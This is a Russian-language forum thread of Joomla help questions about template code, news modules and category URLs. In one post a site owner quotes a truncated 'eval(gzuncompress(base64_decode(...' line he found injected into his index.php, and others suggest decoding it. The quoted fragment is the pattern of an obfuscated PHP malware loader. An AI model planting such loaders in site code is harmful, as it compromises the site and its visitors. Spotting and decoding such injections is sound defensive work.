Помощь с Joomla!

OP
На сайте с 11.04.2008
59
Poltos:
А в индексном файле темплейта что прописано, касаемо этих иконок, не помните))

У меня в индексном этот код

<?php if ($this->params->get('social_fb') or  $this->params->get('social_tw')) { ?>

<div id="ice_social">

<?php if($this->params->get('social_tw')) { ?>
<div id="social_tw">
<?php echo $social_tw; ?>
</div>
<?php } ?>

<?php if($this->params->get('social_fb')) { ?>
<div id="social_fb">
<?php echo $social_fb; ?>
</div>
<?php } ?>

</div>
<?php } ?>
F
На сайте с 02.01.2013
81

Внизу на сайте появились надписи:

Notice: Undefined index: link_act in /var/www/shkaf/data/www/okno23.in/vldisign/gate.php on line 58 Notice: Undefined variable: file in /var/www/shkaf/data/www/okno23.in/vldisign/gate.php on line 112 Warning: file(): Filename cannot be empty in /var/www/shkaf/data/www/okno23.in/vldisign/gate.php on line 112 Warning: mysql_fetch_array() expects parameter 1 to be resource, array given in /var/www/shkaf/data/www/okno23.in/vldisign/gate.php on line 115 Notice

Как это убрать? Когда ввел в гугле "/var/www/shkaf/data/www/okno23.in/vldisign/gate.php on line 112", заметил, что в выдаче есть достаточно много результатов... Что это может быть? Вначале я подумал, что это связано с sape, но затем понял, что нет (после удаления кода).

UPD. Проблему решил сам, удалив из кода это нечто:

"eval(gzuncompress(base64_decode('eF5tjlELgjAUhf9KD8EUIsS1kYQP9mIMIzDSuQhxmxKiBoqU"

Что это было? В index.php почти в самом конце (после кода счетчиков). Это не вирус?

F
На сайте с 02.01.2013
81

Есть сайт - категорий много.

Главная страница - тоже категория. Однако там материал обновляется очень редко. Возможно ли, чтобы на главной странице появились материалы из другой категории, но в то же время только свежие и только на первой странице, т.е. чтобы они не попадали в общий список?

Funaki
На сайте с 13.09.2008
130
Feorek:
Есть сайт - категорий много.
Главная страница - тоже категория. Однако там материал обновляется очень редко. Возможно ли, чтобы на главной странице появились материалы из другой категории, но в то же время только свежие и только на первой странице, т.е. чтобы они не попадали в общий список?

ставьте любой из модулей анонсов (например Mod News Pro GK4) только на главную и задавайте как хотите, вплоть до указания статей

one
На сайте с 15.04.2007
336
one
UPD. Проблему решил сам, удалив из кода это нечто:
"eval(gzuncompress(base64_decode('eF5tjlELgjAUhf9KD8EUIsS1kYQP9mIMIzDSuQhxmxKiBoqU"
Что это было? В index.php почти в самом конце (после кода счетчиков). Это не вирус?

Смотрите тут http://base64.ru/

Решения для автоматизации действий ( https://www.facebook.com/automationstudio20/ ) в интернете.
[Удален]
Feorek:

"eval(gzuncompress(base64_decode('eF5tjlELgjAUhf9KD8EUIsS1kYQP9mIMIzDSuQhxmxKiBoqU

Вместо eval впишите echo и увидите исходный код

F
На сайте с 02.01.2013
81
Funaki:
ставьте любой из модулей анонсов (например Mod News Pro GK4) только на главную и задавайте как хотите, вплоть до указания статей

Спасибо! Поставил именно Mod News Pro GK4. Однако возможно ли сделать так, чтобы модуль отображался только на главной, но не отображался, когда открывается любой материал из данной категории? А то когда открываю материал из категории, то модуль, к сожалению, открывается тоже, что не очень удобно.

one
На сайте с 15.04.2007
336
one
Feorek:
Спасибо! Поставил именно Mod News Pro GK4. Однако возможно ли сделать так, чтобы модуль отображался только на главной, но не отображался, когда открывается любой материал из данной категории? А то когда открываю материал из категории, то модуль, к сожалению, открывается тоже, что не очень удобно.

Привяжите его к пункту меню который у Вас выводит материалы на главной.

F
На сайте с 02.01.2013
81
one:
Привяжите его к пункту меню который у Вас выводит материалы на главной.

А как это сделать? Я открываю модуль, там внизу есть выбор. Указываю, что он должен быть отображен только на главной странице, а затем выбираю место расположения модуля... Но вот если я открываю любой материал на главной, то модуль открывается тоже (вместе со статьей).

A
На сайте с 23.07.2013
49

Здравствуйте, подскажите как создать материал с адресом site.ru/kategoria/podkategoria/material

я создал категорию с алиасом kategoria. создал категорию с алиасом podkategoria в качестве родителя выбрал kategoria далее создал материал с алиасом material выбрав категорию podkategoria В итоге получил адрес site.ru/material Где я протормозил?

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий